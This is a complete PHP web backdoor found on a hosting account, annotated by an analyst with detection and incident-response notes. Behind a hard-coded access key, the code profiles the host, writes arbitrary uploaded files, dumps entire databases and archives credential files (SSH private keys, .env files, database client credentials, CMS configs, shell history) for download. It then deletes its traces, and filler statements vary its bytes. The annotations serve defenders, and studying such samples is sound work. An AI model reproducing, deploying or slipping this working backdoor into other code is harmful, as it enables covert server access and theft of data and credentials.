File: /home/trebiaseguros/.cgi_handler_61fc1f05
<?php
// Analyst note: access gate. The rest of the file runs only when the request
// carries a `_cxk` parameter equal to this hard-coded key; otherwise the
// script returns without producing any output. The key is read from
// $_REQUEST, so when hunting in web logs look for `_cxk` in query strings and
// keep in mind that POST bodies are usually not logged. The first eight
// characters of the key (61fc1f05) match the suffix of the file name shown in
// the listing header.
if (!isset($_REQUEST['_cxk']) || $_REQUEST['_cxk'] !== '61fc1f0512f127cbdc6deb35542f4cae') { return; }
// Drop every active output buffer so only this script's own output is sent.
while (ob_get_level()) ob_end_clean();
// Remove the execution time limit, silence PHP error reporting, and keep
// running after the client disconnects.
set_time_limit(0);
error_reporting(0);
ignore_user_abort(true);
// Database host, user and password later handed to mysqli and mysqldump.
// User and password are empty strings in this listing; whether they were
// never filled in or were redacted cannot be told from here.
$r4690 = 'localhost';
$id9da = '';
$i0907 = '';
// Hard-coded base directory; every file path the script builds starts here.
$j7577 = '/home/trebiaseguros';
// Requested action name, dispatched by the switch at the end of the file.
$z97af = isset($_REQUEST['a']) ? $_REQUEST['a'] : '';
// NOTE(analyst): no-op. The constant name is a random-looking hex string and
// the variable is not read anywhere in this listing. Statements of this shape
// (defined('<hex>'), chr().chr(), str_repeat('x',0), strlen('<hex>'),
// array_merge(array(),array()), max(0,min(1,N))) recur throughout the file
// and look like filler meant to vary the file's bytes; treat them as noise
// and key signatures on the stable strings and structure instead.
if(defined('9bce6211')){$g382b=0;}
// Database name from the request, reduced to the characters [A-Za-z0-9_].
$t33e3 = isset($_REQUEST['db']) ? preg_replace('/[^a-zA-Z0-9_]/', '', $_REQUEST['db']) : '';
// Dump artefact: <base>/tmp/<db>_dump.sql.gz
$yc0b3 = $j7577 . '/tmp/' . $t33e3 . '_dump.sql.gz';
$wa361=chr(73).chr(100);
// Completion marker: <dump>.done
$v31b3 = $yc0b3 . '.done';
if(defined('f0302600')){$j8819=0;}
// Error text file: <dump>.err
$k6323 = $yc0b3 . '.err';
// Responses default to JSON; the download actions override this header.
header('Content-Type: application/json');
if(defined('ebc5a4f0')){$q631a=0;}
/**
 * Reports whether exec() can be called in this PHP configuration.
 *
 * Analyst note: the generic name does not describe the behaviour. When this
 * returns false the script skips its mysqldump and tar code paths and uses
 * the mysqli and ZipArchive paths instead, so disabling exec() narrows but
 * does not remove what the file can do.
 *
 * @return bool false when exec() does not exist or is named in the
 *              `disable_functions` ini setting, true otherwise.
 */
function handle_opt_3cae() {
if (!function_exists('exec')) return false;
// disable_functions is a comma-separated list; trim each entry before matching.
$kab16 = array_map('trim', explode(',', ini_get('disable_functions')));
return !in_array('exec', $kab16);
}
/**
 * Reports whether a `mysqldump` binary is found on the PATH.
 *
 * Runs `which mysqldump` through exec() and checks for exit status 0.
 * Analyst note: each call spawns a `which` process under the PHP user, which
 * is visible to process-creation logging.
 *
 * @return bool true when exec() is usable and `which mysqldump` exits 0.
 */
function handle_info_8bd1() {
@clearstatcache();
if (!handle_opt_3cae()) return false;
$out = array();
$rc = 0;
exec('which mysqldump 2>/dev/null', $out, $rc);
return $rc === 0;
}
/**
 * Reports whether a `gzip` binary is found on the PATH.
 *
 * Runs `which gzip` through exec() and checks for exit status 0; the result
 * decides whether the mysqldump pipeline compresses its output.
 *
 * @return bool true when exec() is usable and `which gzip` exits 0.
 */
function load_val_06d3() {
if (!handle_opt_3cae()) return false;
$out = array();
// No-op filler: the variable is not read anywhere in this listing.
if(defined('f234b21a')){$c35fe=0;}
$rc = 0;
exec('which gzip 2>/dev/null', $out, $rc);
return $rc === 0;
}
/**
 * Pure-PHP database dump, used by the `dump` action when mysqldump is not
 * available.
 *
 * Connects with mysqli and writes a gzip-compressed SQL script containing
 * table definitions and data, views, stored procedures and functions, and
 * triggers. Failures are reported by writing text to the error file; the
 * done-marker file is touched on both the failure and the success paths.
 *
 * Analyst note: the name suggests a harmless getter, but this function copies
 * an entire database to a file under the account's tmp directory. Files it
 * produces start with the comment line "-- Dump via PHP agent" once
 * decompressed, which is a usable content marker when hunting for leftover
 * dumps.
 *
 * @param string $v67cc  Database host.
 * @param string $w008b  Database user.
 * @param string $pa3f5  Database password.
 * @param string $f5006  Database (schema) name.
 * @param string $w3baf  Path of the gzip output file.
 * @param string $i1a15  Path of the error text file.
 * @param string $hc6ed  Path of the completion marker file.
 * @return void
 */
function get_info_e90c($v67cc, $w008b, $pa3f5, $f5006, $w3baf, $i1a15, $hc6ed) {
$conn = new mysqli($v67cc, $w008b, $pa3f5, $f5006);
if ($conn->connect_error) {
// No-op filler assignment; not read anywhere in this listing.
$jd34e=chr(67).chr(109);
// Record the failure and mark the job finished so a status poll stops waiting.
file_put_contents($i1a15, 'Connection failed: ' . $conn->connect_error);
touch($hc6ed);
return;
}
// 'wb6': binary write at gzip compression level 6.
$fp = gzopen($w3baf, 'wb6');
if (!$fp) {
file_put_contents($i1a15, 'Cannot open output file');
touch($hc6ed);
return;
}
$conn->set_charset('utf8mb4');
// Fixed header lines: a stable marker string followed by a timestamp.
gzwrite($fp, "-- Dump via PHP agent\n");
gzwrite($fp, "-- Date: " . date('Y-m-d H:i:s') . "\n\n");
gzwrite($fp, "SET NAMES utf8mb4;\n");
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 0;\n");
gzwrite($fp, "SET SQL_MODE = 'NO_AUTO_VALUE_ON_ZERO';\n\n");
// Pass 1: collect the names of all base tables (views are handled later).
$s5496 = array();
$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'BASE TABLE'");
while ($row = $r->fetch_row()) {
$s5496[] = $row[0];
}
// Pass 2: for each table write DROP + CREATE, then every row as INSERTs.
foreach ($s5496 as $b84a8) {
$te = $conn->real_escape_string($b84a8);
$r = $conn->query("SHOW CREATE TABLE `{$te}`");
if (!$r) continue;
$cr = $r->fetch_row();
gzwrite($fp, "DROP TABLE IF EXISTS `{$te}`;\n");
gzwrite($fp, $cr[1] . ";\n\n");
// MYSQLI_USE_RESULT: unbuffered result, rows are fetched as they are read.
$r = $conn->query("SELECT * FROM `{$te}`", MYSQLI_USE_RESULT);
if (!$r) continue;
// $z2b6b holds the pending row tuples, $v26f5 their combined byte length.
$z2b6b = array();
$v26f5 = 0;
while ($row = $r->fetch_row()) {
$vals = array();
for ($i = 0; $i < count($row); $i++) {
if(defined('a2ee7505')){$k3706=0;}
// NULL stays an SQL NULL; every other value is written as a quoted,
// escaped string.
if ($row[$i] === null) {
$vals[] = 'NULL';
} else {
$vals[] = "'" . $conn->real_escape_string($row[$i]) . "'";
}
}
$fb2e5=chr(65).chr(98);
$w2e34 = '(' . implode(',', $vals) . ')';
$z2b6b[] = $w2e34;
$v26f5 += strlen($w2e34);
// Flush one multi-row INSERT after 100 rows or more than 1048576 bytes
// (1 MiB) of row text.
if (count($z2b6b) >= 100 || $v26f5 > 1048576) {
gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $z2b6b) . ";\n");
$z2b6b = array();
$v26f5 = 0;
}
}
// Flush whatever is left of the last batch.
if ($z2b6b) {
gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $z2b6b) . ";\n");
}
$r->free();
gzwrite($fp, "\n");
}
// Views: DROP + the CREATE VIEW statement reported by the server.
$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'VIEW'");
$v4f06=array_merge(array(),array());
if ($r) {
$v2924=chr(65).chr(98);
while ($row = $r->fetch_row()) {
$ve = $conn->real_escape_string($row[0]);
$cr = $conn->query("SHOW CREATE VIEW `{$ve}`");
if ($cr) {
$ye1e8=chr(88).chr(117);
$wf895 = $cr->fetch_assoc();
gzwrite($fp, "DROP VIEW IF EXISTS `{$ve}`;\n");
gzwrite($fp, $wf895['Create View'] . ";\n\n");
}
}
$d4797=max(0,min(1,1));
}
// Stored routines: the same loop runs once for PROCEDURE and once for FUNCTION.
$r978f = array('PROCEDURE', 'FUNCTION');
foreach ($r978f as $k13d9) {
$r = $conn->query("SHOW {$k13d9} STATUS WHERE Db = '" . $conn->real_escape_string($f5006) . "'");
if (!$r) continue;
while ($row = $r->fetch_assoc()) {
$re = $conn->real_escape_string($row['Name']);
$cr = $conn->query("SHOW CREATE {$k13d9} `{$re}`");
if (!$cr) continue;
$zb491=max(0,min(1,1));
$wf895 = $cr->fetch_assoc();
// Result column that carries the routine body for this routine kind.
$key = ($k13d9 === 'PROCEDURE') ? 'Create Procedure' : 'Create Function';
if(defined('13217e60')){$dab2a=0;}
if (isset($wf895[$key])) {
$a4c38=array_merge(array(),array());
// Routine bodies contain ';', so the script switches the delimiter
// around each definition.
gzwrite($fp, "DELIMITER ;;\n");
gzwrite($fp, "DROP {$k13d9} IF EXISTS `{$re}`;;\n");
gzwrite($fp, $wf895[$key] . ";;\n");
gzwrite($fp, "DELIMITER ;\n\n");
}
}
}
// Triggers: DROP + the original CREATE TRIGGER statement.
$r = $conn->query("SHOW TRIGGERS");
$k631c=array_merge(array(),array());
if ($r) {
while ($row = $r->fetch_assoc()) {
$te = $conn->real_escape_string($row['Trigger']);
$qbb1f=array_merge(array(),array());
$cr = $conn->query("SHOW CREATE TRIGGER `{$te}`");
if ($cr) {
$ie7ce=str_repeat('x',0);
$wf895 = $cr->fetch_assoc();
gzwrite($fp, "DELIMITER ;;\n");
gzwrite($fp, "DROP TRIGGER IF EXISTS `{$te}`;;\n");
gzwrite($fp, $wf895['SQL Original Statement'] . ";;\n");
gzwrite($fp, "DELIMITER ;\n\n");
}
}
}
@clearstatcache();
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 1;\n");
gzclose($fp);
$conn->close();
// Touch the completion marker that the `status` action reports as 'done'.
touch($hc6ed);
$e8c43=array_merge(array(),array());
}
// Action dispatcher. The `a` request parameter selects one of: info, upload,
// check, dump, status, download, cleanup, collect, download_collect,
// download_file, cleanup_collect. There is no default case: an unknown value
// falls through to the final exit with only the JSON content-type header set.
// Analyst note: taken together the actions profile the host, write files,
// dump a database, gather credential and configuration files into an
// archive, serve the results, and delete the staging artefacts afterwards.
switch ($z97af) {
// --- info: host fingerprint returned as JSON --------------------------------
// PHP version, OS, server software, script owner and uid, disk space, ini
// limits, the disable_functions list, and whether exec/mysqldump/gzip are
// usable.
case 'info':
echo json_encode(array(
'php' => PHP_VERSION,
'os' => PHP_OS,
'server' => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '',
'user' => get_current_user(),
'uid' => getmyuid(),
'home' => $j7577,
'doc_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '',
'free_disk' => disk_free_space($j7577),
'total_disk' => disk_total_space($j7577),
'max_exec' => ini_get('max_execution_time'),
'mem_limit' => ini_get('memory_limit'),
'upload_max' => ini_get('upload_max_filesize'),
'post_max' => ini_get('post_max_size'),
'disabled' => ini_get('disable_functions'),
'can_exec' => handle_opt_3cae(),
'has_mysqldump' => handle_info_8bd1(),
'has_gzip' => load_val_06d3(),
));
$g1f8f=array_merge(array(),array());
break;
// --- upload: write a file ---------------------------------------------------
// Base64-decodes POST `data` and writes it to <base>/<path>, creating parent
// directories with mode 0755.
// NOTE(analyst): `path` is used as supplied; there is no realpath/containment
// check like the one in download_file. During incident response, treat any
// location writable by the PHP user as one where files may have been created
// or replaced through this action, and look for further dropped files.
case 'upload':
$n80aa = isset($_POST['path']) ? $_POST['path'] : '';
$wf267 = isset($_POST['data']) ? $_POST['data'] : '';
if (!$n80aa || !$wf267) {
echo json_encode(array('ok' => false, 'error' => 'missing path or data'));
break;
}
$c1e27 = $j7577 . '/' . $n80aa;
@mkdir(dirname($c1e27), 0755, true);
$k4e1a = base64_decode($wf267);
$m1700 = file_put_contents($c1e27, $k4e1a);
if(defined('784a068b')){$te601=0;}
echo json_encode(array('ok' => $m1700 !== false, 'path' => $c1e27, 'size' => strlen($k4e1a)));
break;
// --- check: pre-flight sizing for a dump ------------------------------------
// Reads the database's data + index size from information_schema.tables and
// compares it with free disk space; 'has_space' is true when free space
// exceeds twice the database size.
case 'check':
if (!$t33e3) {
$n1cdd=strlen('6f7bdf');
echo json_encode(array('error' => 'missing db parameter'));
break;
}
$dfa8a = disk_free_space($j7577);
$bbea3 = 0;
$conn = @new mysqli($r4690, $id9da, $i0907, 'information_schema');
if (!$conn->connect_error) {
$q = "SELECT SUM(data_length + index_length) s FROM tables WHERE table_schema = '"
. $conn->real_escape_string($t33e3) . "'";
$r = $conn->query($q);
if ($row = $r->fetch_assoc()) {
$bbea3 = (int) $row['s'];
$s6cbe=array_merge(array(),array());
}
$conn->close();
}
echo json_encode(array(
'free' => $dfa8a,
'db_size' => $bbea3,
'has_mysqldump' => handle_info_8bd1(),
'has_gzip' => load_val_06d3(),
'can_exec' => handle_opt_3cae(),
'has_space' => $dfa8a > $bbea3 * 2,
));
break;
// --- dump: start a full database dump ---------------------------------------
// Clears artefacts from any earlier run, then either launches mysqldump in
// the background or, when mysqldump is unavailable, runs the mysqli-based
// dump in get_info_e90c() after the response has been sent.
// Analyst note (detection): on the mysqldump path the command is started as
// `nohup sh -c '<pipeline>'` by the PHP user, and the database password is
// passed as a --password= argument, so it appears in the process list while
// the dump runs. A web-server or PHP child running mysqldump with
// --single-transaction --quick --routines --triggers is a practical
// process-creation signal.
case 'dump':
if (!$t33e3) {
echo json_encode(array('error' => 'missing db parameter'));
break;
}
@mkdir(dirname($yc0b3), 0755, true);
@unlink($yc0b3);
@clearstatcache();
@unlink($v31b3);
$yadeb=chr(78).chr(122);
@unlink($k6323);
if (handle_info_8bd1()) {
$aa803=max(0,min(1,1));
if (load_val_06d3()) {
// gzip present: pipe mysqldump through gzip, then touch the done marker.
$cmd = sprintf(
'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '| gzip > %s 2>%s; touch %s',
escapeshellarg($r4690),
escapeshellarg($id9da),
escapeshellarg($i0907),
escapeshellarg($t33e3),
escapeshellarg($yc0b3),
escapeshellarg($k6323),
escapeshellarg($v31b3)
);
} else {
// gzip absent: the uncompressed dump is written to the same path, so the
// file keeps its .sql.gz name even though it is plain SQL.
$cmd = sprintf(
'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '> %s 2>%s; touch %s',
escapeshellarg($r4690),
escapeshellarg($id9da),
escapeshellarg($i0907),
escapeshellarg($t33e3),
escapeshellarg($yc0b3),
escapeshellarg($k6323),
escapeshellarg($v31b3)
);
}
$hce63=str_repeat('x',0);
// Detached background job: the HTTP request returns at once and the client
// is expected to poll the `status` action.
exec('nohup sh -c ' . escapeshellarg($cmd) . ' >/dev/null 2>&1 &');
$z6a54=chr(75).chr(120);
echo json_encode(array('started' => true, 'method' => 'mysqldump', 'gzip' => load_val_06d3()));
} else {
ignore_user_abort(true);
echo json_encode(array('started' => true, 'method' => 'php', 'gzip' => true));
// Finish the HTTP response first (FastCGI) or flush the output, then keep
// working inside the same PHP process.
if (function_exists('fastcgi_finish_request')) {
fastcgi_finish_request();
} else {
$jec4a=chr(66).chr(98);
if (ob_get_level()) ob_end_flush();
flush();
}
get_info_e90c($r4690, $id9da, $i0907, $t33e3, $yc0b3, $k6323, $v31b3);
}
break;
// --- status: poll a running dump --------------------------------------------
// Reports whether the .done marker exists, the current dump size, and the
// trimmed contents of the .err file.
case 'status':
clearstatcache();
echo json_encode(array(
'done' => file_exists($v31b3),
'size' => file_exists($yc0b3) ? filesize($yc0b3) : 0,
'error' => file_exists($k6323) ? trim(file_get_contents($k6323)) : '',
));
$t8c7d=str_repeat('x',0);
break;
// --- download: serve the dump file ------------------------------------------
// Streams the dump as application/octet-stream, or answers 404 when it does
// not exist. Analyst note: the response size recorded in the access log for
// these requests is an estimate of how much database content left the host.
case 'download':
if (!file_exists($yc0b3)) {
http_response_code(404);
exit;
// Unreachable filler after exit.
$b377e=max(0,min(1,0));
}
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($yc0b3));
$g38d1=str_repeat('x',0);
readfile($yc0b3);
exit;
// --- cleanup: delete dump artefacts -----------------------------------------
// Removes the dump, .done and .err files. Analyst note: because of this
// action, the absence of those files on disk does not show that no dump was
// taken; rely on logs and process telemetry instead.
case 'cleanup':
@unlink($yc0b3);
$rbc58=max(0,min(1,1));
@unlink($v31b3);
@unlink($k6323);
$t3601=strlen('8ee958');
echo json_encode(array('ok' => true));
break;
// --- collect: gather credential and configuration files ---------------------
// Builds a list of sensitive files under the base directory and packs them
// into <base>/tmp/_collect_<tag>.zip or .tar.gz.
// Analyst note (response): every file named below that existed and was
// readable by the PHP user should be treated as disclosed. That covers
// database and application secrets in CMS configs and .env files, SSH private
// keys, TLS private keys, stored client credentials (.my.cnf, .pgpass,
// .netrc, .npmrc, auth.json) and shell history; rotate what they contain.
case 'collect':
@mkdir($j7577 . '/tmp', 0755, true);
$s0f08=str_repeat('x',0);
// Archive tag: the first 8 characters of the access key, which for the key
// accepted by the gate is 61fc1f05.
$sd2c2 = substr($_REQUEST['_cxk'], 0, 8);
// Per-platform table: 'detect' lists marker paths that identify the
// application, 'configs' lists the extra files gathered for that platform.
$iced3 = array(
'wordpress' => array(
'detect' => array('public_html/wp-config.php', 'wp-config.php'),
'configs' => array(
'public_html/wp-config.php', 'wp-config.php',
'public_html/wp-settings.php',
'public_html/composer.json', 'public_html/composer.lock', 'composer.json', 'composer.lock',
'public_html/wp-cli.yml', 'wp-cli.yml',
'public_html/.env', '.env',
'public_html/local-config.php', 'local-config.php',
'public_html/wp-content/debug.log',
'public_html/config/application.php', 'config/application.php',
'public_html/config/environments/development.php', 'config/environments/development.php',
'public_html/config/environments/staging.php', 'config/environments/staging.php',
'public_html/config/environments/production.php', 'config/environments/production.php',
'public_html/auth.json', 'auth.json',
),
),
'joomla' => array(
'detect' => array('public_html/configuration.php', 'configuration.php'),
'configs' => array(
'public_html/configuration.php', 'configuration.php',
'public_html/htaccess.txt',
'public_html/composer.json', 'public_html/composer.lock',
),
),
'laravel' => array(
'detect' => array('public_html/artisan', 'artisan'),
'configs' => array(
'public_html/.env', '.env', '.env.production', '.env.staging',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
'public_html/config/app.php', 'config/app.php',
'public_html/config/database.php', 'config/database.php',
'public_html/config/mail.php', 'config/mail.php',
'public_html/config/filesystems.php', 'config/filesystems.php',
'public_html/config/cache.php', 'config/cache.php',
'public_html/config/queue.php', 'config/queue.php',
'public_html/config/session.php', 'config/session.php',
'public_html/config/auth.php', 'config/auth.php',
'public_html/config/services.php', 'config/services.php',
'public_html/config/broadcasting.php', 'config/broadcasting.php',
'public_html/storage/logs/laravel.log', 'storage/logs/laravel.log',
),
),
'magento2' => array(
'detect' => array('public_html/bin/magento', 'bin/magento'),
'configs' => array(
'public_html/app/etc/env.php', 'app/etc/env.php',
'public_html/app/etc/config.php', 'app/etc/config.php',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
'public_html/auth.json', 'auth.json',
),
),
'magento1' => array(
'detect' => array('public_html/app/Mage.php'),
'configs' => array(
'public_html/app/etc/local.xml',
'public_html/app/etc/config.xml',
),
),
'drupal' => array(
'detect' => array('public_html/core/lib/Drupal.php', 'core/lib/Drupal.php'),
'configs' => array(
'public_html/sites/default/settings.php', 'sites/default/settings.php',
'public_html/sites/default/services.yml', 'sites/default/services.yml',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
),
),
'prestashop' => array(
'detect' => array('public_html/config/settings.inc.php'),
'configs' => array(
'public_html/config/settings.inc.php',
'public_html/app/config/parameters.php',
'public_html/app/config/parameters.yml',
'public_html/composer.json',
),
),
'opencart' => array(
'detect' => array('public_html/config.php'),
'configs' => array(
'public_html/config.php',
'public_html/admin/config.php',
),
),
'moodle' => array(
'detect' => array('public_html/lib/moodlelib.php'),
'configs' => array('public_html/config.php'),
),
'whmcs' => array(
'detect' => array('public_html/vendor/whmcs'),
'configs' => array(
'public_html/configuration.php',
'public_html/composer.json', 'public_html/composer.lock',
),
),
);
$x9a52=max(0,min(1,0));
// Platform detection: the first platform, in table order, whose marker path
// exists wins; $mfc00 stays null when none matches.
$mfc00 = null;
$p72da=str_repeat('x',0);
foreach ($iced3 as $g25d8 => $c6a01) {
foreach ($c6a01['detect'] as $a87da) {
if (file_exists($j7577 . '/' . $a87da)) {
$mfc00 = $g25d8;
break 2;
// Unreachable filler after break.
$sd985=max(0,min(1,0));
}
}
$wb64f=str_repeat('x',0);
}
// Platform-independent target list, all relative to the base directory:
// environment files, shell history, client credential files, SSH keys and
// configuration, TLS keys and certificates, hosting-panel and FTP files,
// web-server and PHP configuration, git configuration, and package-manager
// manifests and auth files. Note that 'etc/shadow' is resolved under the
// base directory, not as the system /etc/shadow.
$k3fa7 = array(
'.env', '.env.local', '.env.production', '.env.staging',
'.env.backup', '.env.development', '.env.test',
'.bash_history', '.my.cnf', '.pgpass', '.netrc', '.gitconfig', '.npmrc',
'.composer/auth.json', '.wp-cli/config.yml', '.accesshash',
'.ssh/authorized_keys', '.ssh/id_rsa', '.ssh/id_rsa.pub',
'.ssh/id_ed25519', '.ssh/id_ed25519.pub', '.ssh/id_ecdsa',
'.ssh/config', '.ssh/known_hosts',
'.ssl/private.key', '.ssl/cert.pem', '.ssl/key.pem',
'ssl/certs/private.key',
'.cpanel/contactinfo', 'etc/shadow', '.ftpquota', '.ftpconfig',
'public_html/.env', 'public_html/.env.local', 'public_html/.env.production',
'public_html/.env.staging', 'public_html/.env.backup',
'public_html/.env.development', 'public_html/.env.test',
'public_html/.env.example', 'public_html/.env.dist',
'public_html/.htaccess', 'public_html/.htpasswd', 'public_html/.user.ini',
'public_html/php.ini', 'public_html/.my.cnf', 'public_html/.pgpass',
'public_html/web.config', 'public_html/.ftpconfig',
'public_html/.git/config',
'public_html/auth.json', 'public_html/.npmrc',
'public_html/composer.json', 'public_html/composer.lock',
'config/database.php', 'config/app.php', 'config/mail.php',
'config/services.php', 'config/filesystems.php',
'config/application.php',
'config/environments/development.php',
'config/environments/staging.php',
'config/environments/production.php',
'wp-config.php', 'configuration.php', 'artisan',
'auth.json', 'composer.json', 'composer.lock',
);
// $ef84d maps archive entry name (relative path) => resolved absolute path.
$ef84d = array();
$b6c8a=strlen('c8f0df');
$c45ef = @realpath($j7577);
if (!$c45ef || !is_dir($c45ef)) {
$d884f=chr(83).chr(108);
echo json_encode(array('ok' => false, 'error' => 'home dir not accessible'));
break;
}
// Keep a candidate only if it resolves to a path that starts with the
// resolved base directory, is a readable regular file, and is between 1 and
// 2097152 bytes (2 MiB) in size.
foreach ($k3fa7 as $hf381) {
$q3131 = @realpath($j7577 . '/' . $hf381);
if (!$q3131 || strpos($q3131, $c45ef) !== 0) continue;
if (!is_file($q3131) || !is_readable($q3131)) continue;
$bf0b2 = @filesize($q3131);
if ($bf0b2 <= 0 || $bf0b2 > 2097152) continue;
$pa17d=chr(75).chr(122);
$ef84d[$hf381] = $q3131;
}
// Add the detected platform's config files, with the same filters, skipping
// entries that are already selected.
if ($mfc00 !== null && isset($iced3[$mfc00]['configs'])) {
foreach ($iced3[$mfc00]['configs'] as $y0256) {
if (isset($ef84d[$y0256])) continue;
$q3131 = @realpath($j7577 . '/' . $y0256);
if (!$q3131 || strpos($q3131, $c45ef) !== 0) continue;
$qea32=strlen('e1147d');
if (!is_file($q3131) || !is_readable($q3131)) continue;
$bf0b2 = @filesize($q3131);
if ($bf0b2 <= 0 || $bf0b2 > 2097152) continue;
$vff4e=str_repeat('x',0);
$ef84d[$y0256] = $q3131;
}
$pd4e7=max(0,min(1,0));
}
$nf080=str_repeat('x',0);
// Sweep the top level of public_html (no recursion): every readable dotfile
// and every *.txt file within the size limit is added as well.
$z92d5 = $j7577 . '/public_html';
if (is_dir($z92d5)) {
$taf03=max(0,min(1,0));
$dh = @opendir($z92d5);
if ($dh) {
$b14fe=strlen('347519');
while (($y67d8 = readdir($dh)) !== false) {
if ($y67d8 === '.' || $y67d8 === '..') continue;
$c1e27 = $z92d5 . '/' . $y67d8;
if (!is_file($c1e27) || !is_readable($c1e27)) continue;
$bf0b2 = @filesize($c1e27);
if ($bf0b2 <= 0 || $bf0b2 > 2097152) continue;
if ($y67d8[0] === '.' || strtolower(substr($y67d8, -4)) === '.txt') {
$key = 'public_html/' . $y67d8;
if (!isset($ef84d[$key])) $ef84d[$key] = $c1e27;
}
}
closedir($dh);
}
}
// Nothing matched: report an empty result and stop.
if (empty($ef84d)) {
echo json_encode(array(
'ok' => true, 'method' => 'none', 'platform' => $mfc00,
'file_count' => 0, 'files_list' => array(),
));
break;
}
// Packaging, first choice: ZipArchive writing <base>/tmp/_collect_<tag>.zip.
// $f5ec3 records which method succeeded, $k6be6 the archive path.
$f5ec3 = null;
$k6be6 = null;
if (class_exists('ZipArchive')) {
$b9f6e=str_repeat('x',0);
$k6be6 = $j7577 . '/tmp/_collect_' . $sd2c2 . '.zip';
$f4586 = new ZipArchive();
if ($f4586->open($k6be6, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) {
foreach ($ef84d as $gf598 => $q3131) {
if(defined('fc55b9e1')){$m2981=0;}
$f4586->addFile($q3131, $gf598);
}
if ($f4586->close() && file_exists($k6be6) && filesize($k6be6) > 0) {
$f5ec3 = 'zip';
}
}
}
// Packaging, second choice: `tar czf` through exec(), reading the member
// names from a temporary <archive>.list file that is deleted afterwards.
// Analyst note: a tar process started by the PHP user with -T pointing at a
// _collect_*.tar.gz.list file is a process-creation signal for this path.
if (!$f5ec3 && handle_opt_3cae()) {
$k6be6 = $j7577 . '/tmp/_collect_' . $sd2c2 . '.tar.gz';
$lf = $k6be6 . '.list';
$fh = fopen($lf, 'w');
foreach ($ef84d as $gf598 => $q3131) {
fwrite($fh, $gf598 . "\n");
}
fclose($fh);
$out = array();
if(defined('068c80df')){$seb16=0;}
$rc = 0;
$sacd7=array_merge(array(),array());
exec('tar czf ' . escapeshellarg($k6be6) . ' -C ' . escapeshellarg($j7577)
. ' -T ' . escapeshellarg($lf) . ' 2>/dev/null', $out, $rc);
@unlink($lf);
if ($rc === 0 && file_exists($k6be6) && filesize($k6be6) > 0) {
$f5ec3 = 'tar';
} else {
$w59ea=chr(65).chr(103);
@unlink($k6be6);
}
}
// Neither archive method worked: only the file list is returned. Presumably
// the files are then fetched one at a time through download_file; that is an
// inference from the action set, not something this branch does itself.
if (!$f5ec3) {
$f5ec3 = 'list';
}
echo json_encode(array(
'ok' => true, 'method' => $f5ec3, 'platform' => $mfc00,
'file_count' => count($ef84d), 'files_list' => array_keys($ef84d),
'size' => ($k6be6 && file_exists($k6be6)) ? filesize($k6be6) : 0,
));
break;
// --- download_collect: serve the collected archive --------------------------
// Sends _collect_<tag>.zip if it exists, otherwise _collect_<tag>.tar.gz,
// otherwise answers 404.
case 'download_collect':
$sd2c2 = substr($_REQUEST['_cxk'], 0, 8);
$n99e8 = $j7577 . '/tmp/_collect_' . $sd2c2 . '.zip';
$m3145 = $j7577 . '/tmp/_collect_' . $sd2c2 . '.tar.gz';
$yb301 = file_exists($n99e8) ? $n99e8 : (file_exists($m3145) ? $m3145 : '');
if (!$yb301) { http_response_code(404); exit; }
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($yb301));
readfile($yb301);
exit;
// --- download_file: serve one file by relative path -------------------------
// Resolves <base>/<path> with realpath() and serves it only when the result
// starts with the resolved base directory and is a readable regular file.
// Analyst note: unlike `collect`, there is no fixed file list and no size
// limit here, so any file the PHP user can read under the base directory was
// reachable through this action.
case 'download_file':
$gf598 = isset($_REQUEST['path']) ? $_REQUEST['path'] : '';
if (!$gf598) { http_response_code(400); exit; }
$c45ef = @realpath($j7577);
$q3131 = @realpath($j7577 . '/' . $gf598);
if (!$q3131 || !$c45ef || strpos($q3131, $c45ef) !== 0
|| !is_file($q3131) || !is_readable($q3131)) {
http_response_code(404);
exit;
}
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($q3131));
readfile($q3131);
exit;
// --- cleanup_collect: delete the collected archive --------------------------
// Removes the .zip, .tar.gz and .tar.gz.list staging files. As with
// `cleanup`, their absence on disk is therefore not evidence that no
// collection took place.
case 'cleanup_collect':
$sd2c2 = substr($_REQUEST['_cxk'], 0, 8);
@unlink($j7577 . '/tmp/_collect_' . $sd2c2 . '.zip');
$qc2c6=max(0,min(1,0));
@unlink($j7577 . '/tmp/_collect_' . $sd2c2 . '.tar.gz');
@unlink($j7577 . '/tmp/_collect_' . $sd2c2 . '.tar.gz.list');
echo json_encode(array('ok' => true));
break;
// Unreachable filler after break.
$j25bc=str_repeat('x',0);
}
// Stop here so that nothing else is appended to the response.
exit;
// Unreachable filler after exit.
$cad5d=str_repeat('x',0);